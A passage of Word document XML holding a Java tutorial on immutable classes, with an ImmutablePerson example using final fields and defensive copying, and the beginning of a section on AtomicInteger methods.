    <w:p w14:paraId="5F893726" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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class does not provide any "setter" methods that could modify the values of the fields after the object is created. This ensures the immutability of the object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1597E1" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">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void setName(String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D705BDF" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">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name = name; // This method does not exist in an immutable class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A813847" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">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A58D376" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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itialization via constructor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB51D45" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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fields of an immutable class are typically initialized via the constructor when the object is created. Once set, they cannot be changed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B30E43D" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">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ImmutableClass(String name, int age) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB0E1E3" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">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name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D68040" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">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age = age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41031FB2" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">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FE3C0AA" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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ensive copying:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F62FACC" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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immutable class contains fields that refer to mutable objects (like arrays, lists, or other objects), defensive copying is performed. This means that the mutable objects are copied before being stored, and copies are returned when accessed. This ensures that the internal state of the class cannot be modified from the outside.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233C3110" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">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ivate final List&lt;String&gt; hobbies;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5732FB31" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59DB7279" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">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ImmutableClass(List&lt;String&gt; hobbies) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C36678" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">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e a new list to ensure the original list is not modified outside</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3EF39E" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">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hobbies = new ArrayList&lt;&gt;(hobbies);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6314CF0F" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">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0586A69" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AF71091" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">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List&lt;String&gt; getHobbies() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03435D07" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">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Return a copy of the list to prevent external modification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A547A8F" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">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new ArrayList&lt;&gt;(hobbies);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EE8F74" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">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C0214E7" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6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an Immutable Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E8D1DD"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st;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC7CD00"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List;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081037F2" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="713EE234"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final class ImmutablePerson {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1478D3F0"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final String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A675927"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final int age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D42B7F"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final List&lt;String&gt; hobbies;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B958A92" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02F1B7F1"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onstructor to initialize fields</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2A552C"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ImmutablePerson(String name, int age, List&lt;String&gt; hobbies) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09122A71"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name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F2F709"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age = age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFBE0C6"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Defensive copy of the mutable object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EAD0DD"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hobbies = new ArrayList&lt;&gt;(hobbies);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735B8C51"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A22FE0F" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B793807"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Getter methods (no setters to modify fields)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04672F53"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ring getName() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058F4146"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name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C7BDCB"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0C90AC3" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BAE918A"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int getAge() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3312258A"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return age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A36EC3C"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811901E" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24D28BF8"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Defensive copy when returning a mutable object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C505DFE"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List&lt;String&gt; getHobbies() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7232BC40"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new ArrayList&lt;&gt;(hobbies);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6CE16E"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F110E4E"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C5E9BE8"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Main method to test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148FD765"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6D46F570"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String&gt; hobbies = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5642A8EC"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hobbies.add("Reading");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56573A7A"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hobbies.add("Traveling");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6B44DE" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D3DDDBB"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mmutablePerson person = new ImmutablePerson("John", 25, hobbies);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197003C3" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="794D057C"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ccessing fields through getter methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD8685A"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Name: " + person.getName());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B27F35F"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Age: " + person.getAge());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B089EF"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Hobbies: " + person.getHobbies());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA86A91" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="410D2739"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Trying to modify the list (will not affect the original object)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A69AF0"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hobbies.add("Photography");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0292ABE1"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Person's Hobbies after modification: " + person.getHobbies());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD87D2D"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F470828"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310CB16" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564BDBB0" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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class ImmutablePerson is marked as final to prevent subclassing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3737E0D4" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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fields name, age, and hobbies are final and initialized via the constructor. After initialization, these fields cannot be changed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B90273" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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hobbies field is a mutable object (List&lt;String&gt;), so a defensive copy of the list is made in the constructor, and when accessing the list, a copy is returned, not the original list. This ensures that the list cannot be modified from outside the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559FE306" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6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dvantages of Immutable Classes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D530B9" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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 Safety:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABB175B" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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ce immutable objects cannot be modified after they are created, they are inherently thread-safe. Multiple threads can access the same immutable object without synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167BB223" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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curity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226DA569" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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mutable objects are often used for security-sensitive data. Since they cannot be altered, sensitive information (e.g., passwords, encryption keys) is less likely to be tampered with.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636F6590" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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edictability and Debugging:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43983CE6" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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mutable objects simplify debugging and reasoning about your code, as their state never changes. This makes the program more predictable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4265197F" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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aching:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B900417" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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mutable objects can be safely shared and reused across multiple parts of an application. They can be used as keys in hash-based collections (like HashMap or HashSet) without worrying about their state changing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF9AFDD" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6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6BDC6C07" w14:textId="77777777" w:rsidR="00840744" w:rsidRPr="00CE4B95" w:rsidRDefault="00840744" w:rsidP="008F0B6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n </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>immutable class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a class that ensures the integrity of its state by making sure that once an object is created, its fields cannot be modified. This is achieved by using final fields, a constructor for initialization, and avoiding setter methods. Immutable classes offer benefits such as thread safety, easier debugging, and reliability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB72C79" w14:textId="1AB8E260"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00CEBA4">
          <v:rect id="_x0000_i1187" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="007C88F1" w14:textId="6FA35B78" w:rsidR="001D1EE4" w:rsidRPr="00CE4B95" w:rsidRDefault="007B20A4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc196307540"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">What is </w:t>
      </w:r>
      <w:r w:rsidR="0057364C" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>atomic</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> integer in java</w:t>
      </w:r>
      <w:r w:rsidR="001D1EE4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w14:paraId="29B463BE" w14:textId="31AFFDE6" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">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an </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AtomicInteger</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a class that provides an integer value that may be updated atomically. It is part of the java.util.concurrent.atomic package and is used when multiple threads need to modify an integer value concurrently without causing issues like race conditions or synchronization problems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08633902" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76B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Features of AtomicInteger:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618EB20E" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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tomic Operations:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The operations provided by AtomicInteger, such as incrementAndGet(), decrementAndGet(), getAndAdd(), and compareAndSet(), are atomic, meaning they are performed in a single, uninterrupted operation. These operations are designed to work without locks and are thread-safe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A51A2FF" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Synchronization Needed:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Unlike using synchronized blocks or ReentrantLock to ensure thread safety while modifying a shared integer, AtomicInteger uses low-level hardware instructions to provide atomicity, making it more efficient in some cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E6D74B" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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n-blocking:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Since it does not rely on locking, it is more efficient for applications with frequent read and write operations on shared variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADE3D19" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76B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Methods in AtomicInteger:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADAD4A7" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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get():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781CEC26" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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s the current value of the atomic integer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089C53B6" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">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 currentValue = atomicInteger.get();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704421CA" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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t(int newValue):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D136D3" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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ts the value of the atomic integer to a new value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7530FA9D" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">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tomicInteger.set(10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730B618E" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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crementAndGet():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AA6805" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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tomically increments the value by 1 and returns the new value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22653CCB" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">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 newValue = atomicInteger.incrementAndGet();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D9FB55" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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crementAndGet():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658BBF92" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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tomically decrements the value by 1 and returns the new value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D41401F" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">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 newValue = atomicInteger.decrementAndGet();</w:t>
      </w:r>
    </w:p>
